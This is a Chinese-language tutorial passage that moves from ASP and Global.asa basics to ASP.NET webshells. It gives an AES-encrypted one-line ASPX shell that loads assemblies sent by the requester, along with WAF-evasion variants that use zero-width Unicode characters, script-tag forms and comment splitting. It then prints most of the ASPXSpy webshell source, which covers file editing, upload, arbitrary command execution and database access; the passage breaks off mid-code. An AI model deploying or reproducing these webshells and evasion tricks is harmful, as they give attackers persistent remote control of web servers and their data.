[TOC]
1.Active Server Page(ASP)
ASP是动态服务器页面(Active Server Page),是微软公司开发替代CGI脚本程序的一种应用,他可以与数据库和其他程序进行交互,是一个方便的简单的编程工具,ASP的网页格式是.asp.常在常用于各种动态网站中
0x1ASP脚本
微软的ASP语言经历了一个较长时间的发展,本质上是微软把PC上的脚本执行能力嵌入到服务端(后来集成到了IIS)
1.VBScript:VB语言
·ADO(ActiveX Data Object),这个组件使得程序对数据库的操作非常简单
·COM++
2.JavaScript:本质上来说,js并不是浏览器专属语言,任何编译并继承了js Jit引擎的宿主程序都可以解释并运行任何js代码,而IIS ASP就继承了js引擎
ASP基本语法
//注意language、CodePage都可以省略,则默认为VBScript
<%@ language="javascript"%>
<% Response.Write("Hello World!") %>
//javascript可以简写为jscript
<%@ language="jscript"%>
<% Response.Write("Hello World!") %>
<%@ CodePage=65001 Language="VBScript"%>
<% Response.Write("Hello World!") %>
0x2 ASP内建对象和ActiveX组件的引用
ASP提供一系列由数据和程序代码封装而成的组件,目的是
1.扩展功能
2.简化开发
丰富的功能也为大马提供了条件,大马科以利用这些扩展组件API实现文件管理,命令执行,
ASP提供了六个内建对象,无须事先声明就可以直接使用
1. Request: 负责从用户端接收信息
2. Response: 负责传送信息给用户
3. Sever: 负责控制ASP的运行环境
4. Session: 负责存储个别用户的信息,以便重复使用
5. Application: 负责存储数据以供多个用户使用
6. ObjectContext: 可供ASP程序直接配合MTS进行分散式的事务处理
除ASP内置的内建对象,ASP还可以使用ActionX组件,ActionX组件必须现在服务器上注册,然后使用Server对象的CreateObject方法创建一个组建实例
0x3 global.asa文件
Global.asa文件是一个可选文件,他可能包含可被ASP应用程序中每个页面访问的对象,变量以及方法声明。所有合法脚本代码都能在Global.asa中使用
Global.asa文件可包含下列内容
1. Application事件
2. Session事件
3. <object> 声明
4. TypeLibrary 声明
5. #include 指令
//Global.asa 文件须存放于 ASP 应用程序的根目录中,且每个应用程序只能有一个 Global.asa 文件
Global.asa中的事件
在Global.asa中,可以告知application和session对象在启动和结束时做了什么事情,完成这项任务的代码被放置在事件操作器中
Global.asa文件能包含四种类型的事件
1. Application_OnStart: 此事件会在首位用户从 ASP 应用程序调用第一个页面时发生。此事件会在 web 服务器重启或者 Global.asa 文件被编辑之后发生
2. Session_OnStart: 此事件会在每当新用户请求他或她的在 ASP 应用程序中的首个页面时发生
3. Session_OnEnd: 此事件会在每当用户结束 session 时发生。在规定的时间(默认的事件为 20 分钟)内如果没有页面被请求,session 就会结束
4. Application_OnEnd: 此事件会在最后一位用户结束其 session 之后发生。典型的情况是,此事件会在 Web 服务器停止时发生。此子程序用于在应用程序停止后清除设置,比如删除记录或者向文本文件写信息
Global.asa文件可能类似于这样
<script language="vbscript" runat="server">
sub Application_OnStart
'some code
end sub
sub Application_OnEnd
'some code
end sub
sub Session_OnStart
'some code
end sub
sub Session_OnEnd
'some code
end sub
</script>
由于无法使用ASP脚本分隔符(<%和%>)在Global.asa文件中插入脚本,我们需要使用HTML的
```go
https://www.freebuf.com/sectool/198286.html
https://github.com/antonioCoco/SharPyShell
ASPX webshell木马变形
unicode空白连接符
unicode是支持在aspx和asmx以及ashx进行的
在unicode有一类字符叫做zwj零宽连字(全称 zero width joiner)
常见的zwj字符有如下几个
\u200c
\u200d
\u200e
\u200f
一个比较有意思的点吧,emoji的表情就是用zwj字符来进行连接的
除了上面的zwj,还有一种unicode编码叫做零宽不折行空格,也就是如下几种字符,都支持在字符间进行拼接
\ufeff
\u202a
\u202b
\u202c
\u202d
\u202e
我们在asp.net环境下就可以利用上述的一些冷门unicode编码来对抗一些waf了
<%@language = c#%>
<%@Import Namespace="System.Reflection"%>
<%Session.Add("k","e45e329feb5d925b"); byte[] k = Encoding.Default.GetBytes(Session[0] + ""),c = Request.BinaryRead(Request.C\u202con\u202dtent\u202bLen\u202egth);
Assembly.Load(new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(k, k).TransformFinalBlock(c, 0, c.Length)).CreateInstance("U").Equals(this);;;;;;;;;;;;;;;;;;;;;%>
aspx别的声明标签
我们知道%@language="C#"%可以与%@language="Csharp"%进行替换
我们知道,在php中有
<script language='php'>
这种标签
其实在asp.net环境下也同样的类似标签
如下图的代码是我们常见的<%%>模式
<% @language="C#" %>
<%Response.Write("hello world ashx");%>
接下来将代码块的形式改成代码块的方式 ,
<script language=csharp runat=server>
void page_load(){Response.Write("hello world");}
</script>
也可以写成下面的这种形式
<script language=csharp runat=server>
void page_load(){Response.Write("hello world");}
</script>
可以看到仅需要添加void page_load(){ } 相关代码,代码大致如下
<script language=csharp runat=server>
void page_load(){
Session.Add("k","e45e329feb5d925b"); byte[] k = Encoding.Default.GetBytes(Session[0] + ""),c = Request.BinaryRead(Request.C\u202con\u202dtent\u202bLen\u202egth);
System.Reflection.Assembly.Load(new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(k, k).TransformFinalBlock(c, 0, c.Length)).CreateInstance("U").Equals(this);
}
</script>
当然,这只是一直简单的替换方式,我们可以和别的Bypass方式进行相结合。
就好比之前的c#替换成 csharp一样,在去年一次实战中就遇到一个AF就是拦截 c#关键字而 而不拦截 csharp
换行特性
C#的///特性和xml
在标准的情况下,c#规定了/// 能够在aspx中作为xml语法的注释,那么我们缩短一下语句,它是注释。
直接看demo案例吧,在不破坏直接语法的情况下(使用换行隔开,可以产生如下的效果)。
可以将该类的注释特性与aspx原本的/xx/和来进行一些结合,
成功
<%
@
language
=
c#
%>
<%
@Import
Namespace="System.Reflection"%>
<%Session.Add("k",
//////@#@!#!@#!@#!@#!@#!@#!@#
"e45e329feb5d925b"); byte[]
//////@#@!#!@#!@#!@#!@#!@#!@#
k = Encoding.Default.GetBytes(Session[0] + ""),
//////@#@!#!@#!@#!@#!@#!@#!@#
c = Request.BinaryRead(Request.C\u202con\u202dtent\u202bLen\u202egth);
//////@#@!#!@#!@#!@#!@#!@#!@#
Assembly.Load(new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(k, k).TransformFinalBlock(c, 0, c.Length)).CreateInstance("U").Equals(this);%>
失败,如果不是//则会出现语法解析错误的问题
<%@language = c#%>
<%@Import Namespace="System.Reflection"%>
<%Session.Add("k","e45e329feb5d925b"); byte[] k = Encoding.Default.GetBytes(Session[0] + ""),c = Request.BinaryRead(Request.C\u202con\u202dtent\u202bLen\u202egth);
\\
Assembly.Load(new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(k, k).TransformFinalBlock(c, 0, c.Length)).CreateInstance("U").Equals(this);%>
大马
aspxspy.aspx
<%@ Page Language="C#" Debug="true" trace="false" validateRequest="false" %>
<%@ import Namespace="System.IO" %>
<%@ import Namespace="System.Diagnostics" %>
<%@ import Namespace="System.Data" %>
<%@ import Namespace="System.Data.OleDb" %>
<%@ import Namespace="Microsoft.Win32" %>
<%@ import Namespace="System.Net.Sockets" %>
<%@ Assembly Name="System.DirectoryServices, Version=2.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A" %>
<%@ import Namespace="System.DirectoryServices" %>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<script runat="server">
/*
Thanks Snailsor,FuYu
Code by Bin
Make in China
Blog: http://www.rootkit.net.cn
E-mail : master@rootkit.net.cn
*/
public string Password = "21232f297a57a5a743894a0e4a801fc3";//PASS:admin
public string SessionName = "ASPXSpy";
public string Bin_Action = "";
public string Bin_Request = "";
protected OleDbConnection conn = new OleDbConnection();
protected OleDbCommand comm = new OleDbCommand();
protected void Page_Load(object sender, EventArgs e)
{
if (Session[SessionName] != "BIN")
{
Bin_login();
}
else
{
if (!IsPostBack)
{
Bin_main();
}
else
{
Bin_Action = Request["goaction"];
if (Bin_Action == "del")
{
Bin_Request = Request["todo"];
Bin_Filedel(Bin_Request, 1);
}
if (Bin_Action == "change")
{
Bin_Request = Request["todo"];
Bin_FileList(Bin_Request);
}
if (Bin_Action == "deldir")
{
Bin_Request = Request["todo"];
Bin_Filedel(Bin_Request, 2);
}
if (Bin_Action == "down")
{
Bin_Request = Request["todo"];
Bin_Filedown(Bin_Request);
}
if (Bin_Action == "rename")
{
Bin_Request = Request["todo"];
Bin_FileRN(Bin_Request, 1);
}
if (Bin_Action == "renamedir")
{
Bin_Request = Request["todo"];
Bin_FileRN(Bin_Request, 2);
}
if (Bin_Action == "showatt")
{
Bin_Request = Request["todo"];
Bin_Fileatt(Bin_Request);
}
if (Bin_Action == "edit")
{
Bin_Request = Request["todo"];
Bin_FileEdit(Bin_Request);
}
if (Bin_Action == "postdata")
{
Bin_Request = Request["todo"];
Session["Bin_Table"] = Bin_Request;
Bin_DataGrid.CurrentPageIndex = 0;
Bin_DBstrTextBox.Text = "";
Bin_Databind();
}
if (Bin_Action == "changedata")
{
Session["Bin_Table"] = null;
Bin_Request = Request["todo"];
Session["Bin_Option"] = Request["intext"];
Bin_Change();
Bin_DBinfoLabel.Visible = false;
Bin_DBstrTextBox.Text = Bin_Request;
}
if (Session["Bin_Table"] != null)
{
Bin_Databind();
}
}
}
}
public void Bin_login()
{
Bin_LoginPanel.Visible = true;
Bin_MainPanel.Visible = false;
Bin_MenuPanel.Visible = false;
Bin_FilePanel.Visible = false;
Bin_CmdPanel.Visible = false;
Bin_SQLPanel.Visible = false;
Bin_SuPanel.Visible = false;
Bin_IISPanel.Visible = false;
Bin_PortPanel.Visible = false;
Bin_RegPanel.Visible = false;
}
public void Bin_main()
{
TimeLabel.Text = DateTime.Now.ToString();
Bin_PortPanel.Visible = false;
Bin_RegPanel.Visible = false;
Bin_LoginPanel.Visible = false;
Bin_MainPanel.Visible = true;
Bin_MenuPanel.Visible = true;
Bin_FilePanel.Visible = false;
Bin_CmdPanel.Visible = false;
Bin_SQLPanel.Visible = false;
Bin_SuPanel.Visible = false;
Bin_IISPanel.Visible = false;
string ServerIP = "Server IP : "+Request.ServerVariables["LOCAL_ADDR"]+"<br>";
string HostName = "HostName : " + Environment.MachineName + "<br>";
string OS = "OS Version : " + Environment.OSVersion + "</br>";
string IISversion = "IIS Version : " + Request.ServerVariables["SERVER_SOFTWARE"] + "<br>";
string PATH_INFO = "PATH_TRANSLATED : " + Request.ServerVariables["PATH_TRANSLATED"] + "<br>";
InfoLabel.Text = "<hr><center><b><U>SYS-INFO</U></B></center>";
InfoLabel.Text += ServerIP + HostName + OS + IISversion + PATH_INFO + "<hr>";
InfoLabel.Text += Bin_Process() + "<hr>";
}
private bool CheckIsNumber(string sSrc)
{
System.Text.RegularExpressions.Regex reg = new System.Text.RegularExpressions.Regex(@"^0|[0-9]*[1-9][0-9]*$");
if (reg.IsMatch(sSrc))
{
return true;
}
else
{
return false;
}
}
public string Bin_iisinfo()
{
string iisinfo = "";
string iisstart = "";
string iisend = "";
string iisstr = "IIS://localhost/W3SVC";
int i = 0;
try
{
DirectoryEntry mydir = new DirectoryEntry(iisstr);
iisstart = "<input type=hidden name=goaction><input type=hidden name=todo><TABLE width=100% align=center border=0><TR align=center><TD width=6%><B>Order</B></TD><TD width=20%><B>IIS_USER</B></TD><TD width=25%><B>Domain</B></TD><TD width=30%><B>Path</B></TD></TR>";
foreach (DirectoryEntry child in mydir.Children)
{
if (CheckIsNumber(child.Name.ToString()))
{
string dirstr = child.Name.ToString();
string tmpstr = "";
DirectoryEntry newdir = new DirectoryEntry(iisstr + "/" + dirstr);
DirectoryEntry newdir1 = newdir.Children.Find("root", "IIsWebVirtualDir");
iisinfo += "<TR><TD align=center>" + (i = i + 1) + "</TD>";
iisinfo += "<TD align=center>" + newdir1.Properties["AnonymousUserName"].Value + "</TD>";
iisinfo += "<TD>" + child.Properties["ServerBindings"][0] + "</TD>";
iisinfo += "<TD><a href=javascript:Command('change','" + formatpath(newdir1.Properties["Path"].Value.ToString()) + "');>" + newdir1.Properties["Path"].Value + "</a></TD>";
iisinfo += "</TR>";
}
}
iisend = "</TABLE><hr>";
}
catch (Exception error)
{
Bin_Error(error.Message);
}
return iisstart + iisinfo + iisend;
}
public string Bin_Process()
{
string htmlstr = "<center><b><U>PROCESS-INFO</U></B></center><TABLE width=80% align=center border=0><TR align=center><TD width=20%><B>ID</B></TD><TD align=left width=20%><B>Process</B></TD><TD align=left width=20%><B>MemorySize</B></TD><TD align=center width=10%><B>Threads</B></TD></TR>";
string prostr = "";
string htmlend = "</TR></TABLE>";
try
{
Process[] myprocess = Process.GetProcesses();
foreach (Process p in myprocess)
{
prostr += "<TR><TD align=center>" + p.Id.ToString() + "</TD>";
prostr += "<TD align=left>" + p.ProcessName.ToString() + "</TD>";
prostr += "<TD align=left>" + p.WorkingSet.ToString() + "</TD>";
prostr += "<TD align=center>" + p.Threads.Count.ToString() + "</TD>";
}
}
catch (Exception Error)
{
Bin_Error(Error.Message);
}
return htmlstr + prostr + htmlend;
}
protected void LoginButton_Click(object sender, EventArgs e)
{
string MD5Pass = FormsAuthentication.HashPasswordForStoringInConfigFile(passtext.Text,"MD5").ToLower();
if (MD5Pass == Password)
{
Session[SessionName] = "BIN";
Bin_main();
}
else
{
Bin_login();
}
}
protected void LogoutButton_Click(object sender, EventArgs e)
{
Session.Abandon();
Bin_login();
}
protected void FileButton_Click(object sender, EventArgs e)
{
Bin_LoginPanel.Visible = false;
Bin_MenuPanel.Visible = true;
Bin_MainPanel.Visible = false;
Bin_FilePanel.Visible = true;
Bin_CmdPanel.Visible = false;
Bin_SQLPanel.Visible = false;
Bin_SuPanel.Visible = false;
Bin_IISPanel.Visible = false;
Bin_PortPanel.Visible = false;
Bin_RegPanel.Visible = false;
Bin_upTextBox.Text = formatpath(Server.MapPath("."));
Bin_CopyTextBox.Text = formatpath(Server.MapPath("."));
Bin_upTextBox.Text = formatpath(Server.MapPath("."));
Bin_FileList(Server.MapPath("."));
}
protected void MainButton_Click(object sender, EventArgs e)
{
Bin_main();
}
public void Bin_DriveList()
{
string file = "<input type=hidden name=goaction><input type=hidden name=todo>";
file += "<hr>Drives : ";
string[] drivers = Directory.GetLogicalDrives();
for (int i = 0; i < drivers.Length; i++)
{
file += "<a href=javascript:Command('change','" + formatpath(drivers[i]) + "');>" + drivers[i] + "</a> ";
}
file += " WebRoot : <a href=javascript:Command('change','" + formatpath(Server.MapPath(".")) + "');>" + Server.MapPath(".") + "</a>";
Bin_FileLabel.Text = file;
}
public void Bin_FileList(string Bin_path)
{
Bin_FilePanel.Visible = true;
Bin_CreateTextBox.Text = "";
Bin_CopytoTextBox.Text = "";
Bin_CopyTextBox.Text = Bin_path;
Bin_upTextBox.Text = Bin_path;
Bin_IISPanel.Visible = false;
Bin_DriveList();
string tmpstr="";
string Bin_Filelist = Bin_FilelistLabel.Text;
Bin_Filelist = "<hr>";
Bin_Filelist += "<table width=90% border=0 align=center>";
Bin_Filelist += "<tr><td width=40%><b>Name</b></td><td width=15%><b>Size(Byte)</b></td>";
Bin_Filelist += "<td width=25%><b>ModifyTime</b></td><td width=25%><b>Operate</b></td></tr>";
try
{
Bin_Filelist += "<tr><td>";
string parstr = "";
if (Bin_path.Length < 4)
{
parstr = formatpath(Bin_path);
}
else
{
parstr = formatpath(Directory.GetParent(Bin_path).ToString());
}
Bin_Filelist += "<i><b><a href=javascript:Command('change','" + parstr + "');>|Parent Directory|</a></b></i>";
Bin_Filelist += "</td></tr>";
DirectoryInfo Bin_dir = new DirectoryInfo(Bin_path);
foreach (DirectoryInfo Bin_folder in Bin_dir.GetDirectories())
{
string foldername = formatpath(Bin_path) + "/" + formatfile(Bin_folder.Name);
tmpstr += "<tr>";
tmpstr += "<td><a href=javascript:Command('change','" + foldername + "')>" + Bin_folder.Name + "</a></td><td><b><i><dir></i></b></td><td>" + Directory.GetLastWriteTime(Bin_path + "/" + Bin_folder.Name) + "</td><td><a href=javascript:Command('renamedir','" + foldername + "');>Ren</a>|<a href=javascript:Command('showatt','" + foldername + "/');>Att</a>|<a href=javascript:Command('deldir','" + foldername + "');>Del</a></td>";
tmpstr += "</tr>";
}
foreach (FileInfo Bin_file in Bin_dir.GetFiles())
{
string filename = formatpath(Bin_path) + "/" + formatfile(Bin_file.Name);
tmpstr += "<tr>";
tmpstr += "<td>" + Bin_file.Name + "</td><td>" + Bin_file.Length + "</td><td>" + Directory.GetLastWriteTime(Bin_path + "/" + Bin_file.Name) + "</td><td><a href=javascript:Command('edit','" + filename + "');>Edit</a>|<a href=javascript:Command('rename','" + filename + "');>Ren</a>|<a href=javascript:Command('down','" + filename + "');>Down</a>|<a href=javascript:Command('showatt','" + filename + "');>Att</a>|<a href=javascript:Command('del','" + filename + "');>Del</a></td>";
tmpstr += "</tr>";
}
tmpstr += "</talbe>";
}
catch (Exception Error)
{
Bin_Error(Error.Message);
}
Bin_FilelistLabel.Text = Bin_Filelist + tmpstr;
}
public void Bin_Filedel(string instr,int type)
{
try
{
if (type == 1)
{
File.Delete(instr);
}
if (type == 2)
{
foreach (string tmp in Directory.GetFileSystemEntries(instr))
{
if (File.Exists(tmp))
{
File.Delete(tmp);
}
else
{
Bin_Filedel(tmp, 2);
}
}
Directory.Delete(instr);
}
}
catch (Exception Error)
{
Bin_Error(Error.Message);
}
Bin_FileList(Bin_upTextBox.Text);
}
public void Bin_FileRN(string instr,int type)
{
try
{
if (type == 1)
{
string[] array = instr.Split(',');
File.Move(array[0], array[1]);
}
if (type == 2)
{
string[] array = instr.Split(',');
Directory.Move(array[0], array[1]);
}
}
catch (Exception Error)
{
Bin_Error(Error.Message);
}
Bin_FileList(Bin_upTextBox.Text);
}
public void Bin_Filedown(string instr)
{
try
{
FileStream MyFileStream = new FileStream(instr, FileMode.Open, FileAccess.Read, FileShare.Read);
long FileSize = MyFileStream.Length;
byte[] Buffer = new byte[(int)FileSize];
MyFileStream.Read(Buffer, 0, (int)FileSize);
MyFileStream.Close();
Response.AddHeader("Content-Disposition", "attachment;filename=" + instr);
Response.Charset = "UTF-8";
Response.ContentType = "application/octet-stream";
Response.BinaryWrite(Buffer);
Response.Flush();
Response.End();
}
catch (Exception Error)
{
Bin_Error(Error.Message);
}
}
public void Bin_Fileatt(string instr)
{
Bin_AttPanel.Visible = true;
Bin_FilePanel.Visible = true;
try
{
string Att = File.GetAttributes(instr).ToString();
Bin_ReadOnlyCheckBox.Checked = false;
Bin_SystemCheckBox.Checked = false;
Bin_HiddenCheckBox.Checked = false;
Bin_ArchiveCheckBox.Checked = false;
if (Att.LastIndexOf("ReadOnly") != -1)
{
Bin_ReadOnlyCheckBox.Checked = true;
}
if (Att.LastIndexOf("System") != -1)
{
Bin_SystemCheckBox.Checked = true;
}
if (Att.LastIndexOf("Hidden") != -1)
{
Bin_HiddenCheckBox.Checked = true;
}
if (Att.LastIndexOf("Archive") != -1)
{
Bin_ArchiveCheckBox.Checked = true;
}
Bin_CreationTimeTextBox.Text = File.GetCreationTime(instr).ToString();
Bin_LastWriteTimeTextBox.Text = File.GetLastWriteTime(instr).ToString();
Bin_AccessTimeTextBox.Text = File.GetLastAccessTime(instr).ToString();
}
catch (Exception Error)
{
Bin_Error(Error.Message);
}
Bin_AttLabel.Text = instr;
Session["FileName"] = instr;
Bin_DriveList();
}
public void Bin_FileEdit(string instr)
{
Bin_FilePanel.Visible = true;
Bin_EditPanel.Visible = true;
Bin_DriveList();
Bin_EditpathTextBox.Text = instr;
StreamReader SR = new StreamReader(instr, Encoding.Default);
Bin_EditTextBox.Text = SR.ReadToEnd();
SR.Close();
}
protected void Bin_upButton_Click(object sender, EventArgs e)
{
string uppath = Bin_upTextBox.Text;
if (uppath.Substring(uppath.Length - 1, 1) != @"/")
{
uppath = uppath + @"/";
}
try
{
Bin_UpFile.PostedFile.SaveAs(uppath + Path.GetFileName(Bin_UpFile.Value));
}
catch (Exception error)
{
Bin_Error(error.Message);
}
Bin_FileList(uppath);
}
public void Bin_Error(string error)
{
Bin_ErrorLabel.Text = "Error : " + error;
}
public string formatpath(string instr)
{
instr = instr.Replace(@"\", "/");
if (instr.Length < 4)
{
instr = instr.Replace(@"/", "");
}
if (instr.Length == 2)
{
instr = instr + @"/";
}
instr = instr.Replace(" ", "%20");
return instr;
}
public string formatfile(string instr)
{
instr = instr.Replace(" ", "%20");
return instr;
}
protected void Bin_GoButton_Click(object sender, EventArgs e)
{
Bin_FileList(Bin_upTextBox.Text);
}
protected void Bin_NewFileButton_Click(object sender, EventArgs e)
{
string newfile = Bin_CreateTextBox.Text;
string filepath = Bin_upTextBox.Text;
filepath = filepath + "/" + newfile;
try
{
StreamWriter sw = new StreamWriter(filepath, true, Encoding.Default);
}
catch (Exception Error)
{
Bin_Error(Error.Message);
}
Bin_FileList(Bin_upTextBox.Text);
}
protected void Bin_NewdirButton_Click(object sender, EventArgs e)
{
string dirpath = Bin_upTextBox.Text;
string newdir = Bin_CreateTextBox.Text;
newdir = dirpath + "/" + newdir;
try
{
Directory.CreateDirectory(newdir);
}
catch(Exception Error)
{
Bin_Error(Error.Message);
}
Bin_FileList(Bin_upTextBox.Text);
}
protected void Bin_CopyButton_Click(object sender, EventArgs e)
{
string copystr = Bin_CopyTextBox.Text;
string copyto = Bin_CopytoTextBox.Text;
try
{
File.Copy(copystr, copyto);
}
catch (Exception Error)
{
Bin_Error(Error.Message);
}
Bin_CopytoTextBox.Text = "";
Bin_FileList(Bin_upTextBox.Text);
}
protected void Bin_CutButton_Click(object sender, EventArgs e)
{
string copystr = Bin_CopyTextBox.Text;
string copyto = Bin_CopytoTextBox.Text;
try
{
File.Move(copystr, copyto);
}
catch (Exception Error)
{
Bin_Error(Error.Message);
}
Bin_CopytoTextBox.Text = "";
Bin_FileList(Bin_upTextBox.Text);
}
protected void Bin_SetButton_Click(object sender, EventArgs e)
{
try
{
string FileName = Session["FileName"].ToString();
File.SetAttributes(FileName, FileAttributes.Normal);
if (Bin_ReadOnlyCheckBox.Checked)
{
File.SetAttributes(FileName, FileAttributes.ReadOnly);
}
if (Bin_SystemCheckBox.Checked)
{
File.SetAttributes(FileName, File.GetAttributes(FileName) | FileAttributes.System);
}
if (Bin_HiddenCheckBox.Checked)
{
File.SetAttributes(FileName, File.GetAttributes(FileName) | FileAttributes.Hidden);
}
if (Bin_ArchiveCheckBox.Checked)
{
File.SetAttributes(FileName, File.GetAttributes(FileName) | FileAttributes.Archive);
}
if (FileName.Substring(FileName.Length - 1, 1) == "/")
{
Directory.SetCreationTime(FileName, Convert.ToDateTime(Bin_CreationTimeTextBox.Text));
Directory.SetLastWriteTime(FileName, Convert.ToDateTime(Bin_LastWriteTimeTextBox.Text));
Directory.SetLastAccessTime(FileName, Convert.ToDateTime(Bin_AccessTimeTextBox.Text));
}
else
{
File.SetCreationTime(FileName, Convert.ToDateTime(Bin_CreationTimeTextBox.Text));
File.SetLastWriteTime(FileName, Convert.ToDateTime(Bin_LastWriteTimeTextBox.Text));
File.SetLastAccessTime(FileName, Convert.ToDateTime(Bin_AccessTimeTextBox.Text));
}
}
catch (Exception Error)
{
Bin_Error(Error.Message);
}
Bin_FileList(Bin_upTextBox.Text);
Response.Write("<script>alert('Success!')</sc" + "ript>");
}
protected void Bin_EditButton_Click(object sender, EventArgs e)
{
try
{
StreamWriter SW = new StreamWriter(Bin_EditpathTextBox.Text, false, Encoding.Default);
SW.Write(Bin_EditTextBox.Text);
SW.Close();
}
catch (Exception Error)
{
Bin_Error(Error.Message);
}
Bin_FileList(Bin_upTextBox.Text);
Response.Write("<script>alert('Success!')</sc" + "ript>");
}
protected void Bin_BackButton_Click(object sender, EventArgs e)
{
Bin_FileList(Bin_upTextBox.Text);
}
protected void Bin_SbackButton_Click(object sender, EventArgs e)
{
Bin_FileList(Bin_upTextBox.Text);
}
protected void Bin_CmdButton_Click(object sender, EventArgs e)
{
Bin_MenuPanel.Visible = true;
Bin_LoginPanel.Visible = false;
Bin_CmdPanel.Visible = true;
Bin_SQLPanel.Visible = false;
Bin_CmdLabel.Text = "";
Bin_SuPanel.Visible = false;
Bin_IISPanel.Visible = false;
Bin_RegPanel.Visible = false;
Bin_PortPanel.Visible = false;
}
protected void Bin_RunButton_Click(object sender, EventArgs e)
{
try
{
Process Cmdpro = new Process();
Cmdpro.StartInfo.FileName = Bin_CmdPathTextBox.Text;
Cmdpro.StartInfo.Arguments = Bin_CmdShellTextBox.Text;
Cmdpro.StartInfo.UseShellExecute = false;
Cmdpro.StartInfo.RedirectStandardInput = true;
Cmdpro.StartInfo.RedirectStandardOutput = true;
Cmdpro.StartInfo.RedirectStandardError = true;
Cmdpro.Start();
string cmdstr = Cmdpro.StandardOutput.ReadToEnd();
cmdstr = cmdstr.Replace("<", "<");
cmdstr = cmdstr.Replace(">", ">");
Bin_CmdLabel.Text = "<hr><div id=\"cmd\"><pre>" + cmdstr + "</pre></div>";
}
catch (Exception Error)
{
Bin_Error(Error.Message);
}
}
protected void Bin_SQLButton_Click(object sender, EventArgs e)
{
Bin_CmdPanel.Visible = false;
Bin_SQLPanel.Visible = true;
Bin_LoginPanel.Visible = false;
Bin_MenuPanel.Visible = true;
Bin_AccPanel.Visible = false;
Bin_Scroll.Visible = false;
Bin_DBmenuPanel.Visible = false;
Bin_dirPanel.Visible = false;
Bin_SuPanel.Visible = false;
Bin_IISPanel.Visible = false;
Bin_PortPanel.Visible = false;
Bin_RegPanel.Visible =false;
}
protected void Bin_SQLRadioButton_CheckedChanged(object sender, EventArgs e)
{
Session["Bin_Table"] = null;
Bin_SQLconnTextBox.Text = "server=localhost;UID=sa;PWD=;database=master;Provider=SQLOLEDB";
Bin_SQLRadioButton.Checked = true;
Bin_AccRadioButton.Checked = false;
Bin_AccPanel.Visible = false;
Bin_DataGrid.Visible = false;
Bin_Scroll.Visible = false;
Bin_DBmenuPanel.Visible = false;
Bin_dirPanel.Visible = false;
}
protected void Bin_AccRadioButton_CheckedChanged(object sender, EventArgs e)
{
Session["Bin_Table"] = null;
Bin_SQLconnTextBox.Text = @"Provider=Microsoft.Jet.OLEDB.4.0;Data Source=E:\wwwroot\database.mdb";
Bin_SQLRadioButton.Checked = false;
Bin_AccRadioButton.Checked = true;
Bin_DBmenuPanel.Visible = false;
Bin_AccPanel.Visible = false;
Bin_DataGrid.Visible = false;
Bin_Scroll.Visible = false;
Bin_dirPanel.Visible = false;
}
protected void OpenConnection()
{
if (conn.State == ConnectionState.Closed)
{
try
{
conn.ConnectionString = Bin_SQLconnTextBox.Text;
comm.Connection = conn;
conn.Open();
}
catch (Exception Error)
{
Bin_Error(Error.Message);
}
}
}
protected void CloseConnection()
{
if (conn.State == ConnectionState.Open)
conn.Close();
conn.Dispose();
comm.Dispose();
}
public DataTable Bin_DataTable(string sqlstr)
{
OleDbDataAdapter da = new OleDbDataAdapter();
DataTable datatable = new DataTable();
try
{
OpenConnection();
comm.CommandType = CommandType.Text;
comm.CommandText = sqlstr;
da.SelectCommand = comm;
da.Fill(datatable);
}
catch (Exception)
{
}
finally
{
CloseConnection();
}
return datatable;
}
protected void SQL_SumbitButton_Click(object sender, EventArgs e)
{
try
{
Session["Bin_Table"] = null;
Bin_DataGrid.CurrentPageIndex = 0;
Bin_DataGrid.AllowPaging = true;
if (Bin_SQLRadioButton.Checked)
{
Bin_DBmenuPanel.Visible = true;
Bin_DBinfoLabel.Visible = true;
Bin_AccPanel.Visible = false;
Bin_Scroll.Visible = false;
Bin_dirPanel.Visible = false;
OpenConnection();
DataTable ver = Bin_DataTable(@"SELECT @@VERSION");
DataTable dbs = Bin_DataTable(@"SELECT name FROM master.dbo.sysdatabases");
DataTable cdb = Bin_DataTable(@"SELECT DB_NAME()");
DataTable rol = Bin_DataTable(@"SELECT IS_SRVROLEMEMBER('sysadmin')");
DataTable owner = Bin_DataTable(@"SELECT IS_MEMBER('db_owner')");
string dbo = "";
if (owner.Rows[0][0].ToString() == "1")
{
dbo = "db_owner";
}
else
{
dbo = "public";
}
if (rol.Rows[0][0].ToString() == "1")
{
dbo = "<font color=blue>sa</font>";
}
string db_info = "";
db_info = "<i><b><font color=red>SQLversion</font> : </b></i>" + ver.Rows[0][0].ToString() + "<br><hr>";
string db_name = "";
for (int i = 0; i < dbs.Rows.Count; i++)
{
db_name += dbs.Rows[i][0].ToString().Replace(cdb.Rows[0][0].ToString(), "<font color=blue>" + cdb.Rows[0][0].ToString() + "</font>") + " | ";
}
db_info += "<i><b><font color=red>DataBase</font> : </b></i><div style=\"width:760px;word-break:break-all\">" + db_name + "<br><div><hr>";
db_info += "<i><b><font color=red>SRVROLEMEMBER</font></i></b> : " + dbo + "<hr>";
Bin_DBinfoLabel.Text = db_info;
}
if (Bin_AccRadioButton.Checked)
{
Bin_DataGrid.Visible = false;
Bin_SAexecButton.Visible = false;
Bin_Accbind();
}
}
catch (Exception E)
{
Bin_Error(E.Message);
}
}
protected void Bin_Accbind()
{
try
{
Bin_DBmenuPanel.Visible = false;
Bin_AccPanel.Visible = true;
OpenConnection();
DataTable acctable = new DataTable();
acctable = conn.GetOleDbSchemaTable(OleDbSchemaGuid.Tables, new Object[] { null, null, null, "Table" });
string accstr = "<input type=hidden name=goaction><input type=hidden name=todo>";
accstr += "Tables Count : " + acctable.Rows.Count + "<br>Please select a database : <SELECT onchange=if(this.value!='')Command('postdata',this);>";
for (int i = 0; i < acctable.Rows.Count; i++)
{
accstr += "<option value=" + acctable.Rows[i].ItemArray[2].ToString() + ">" + acctable.Rows[i].ItemArray[2].ToString() + "</option>";
}
if (Session["Bin_Table"] != null)
{
accstr += "<option SELECTED>" + Session["Bin_Table"] + "</option>";
}
accstr += "</SELECT>";
Bin_AccinfoLabel.Text = accstr;
CloseConnection();
}
catch (Exception Error)
{
Bin_Error(Error.Message);
}
}
protected void Bin_Databind()
{
try
{
Bin_SAexecButton.Visible = false;
Bin_Accbind();
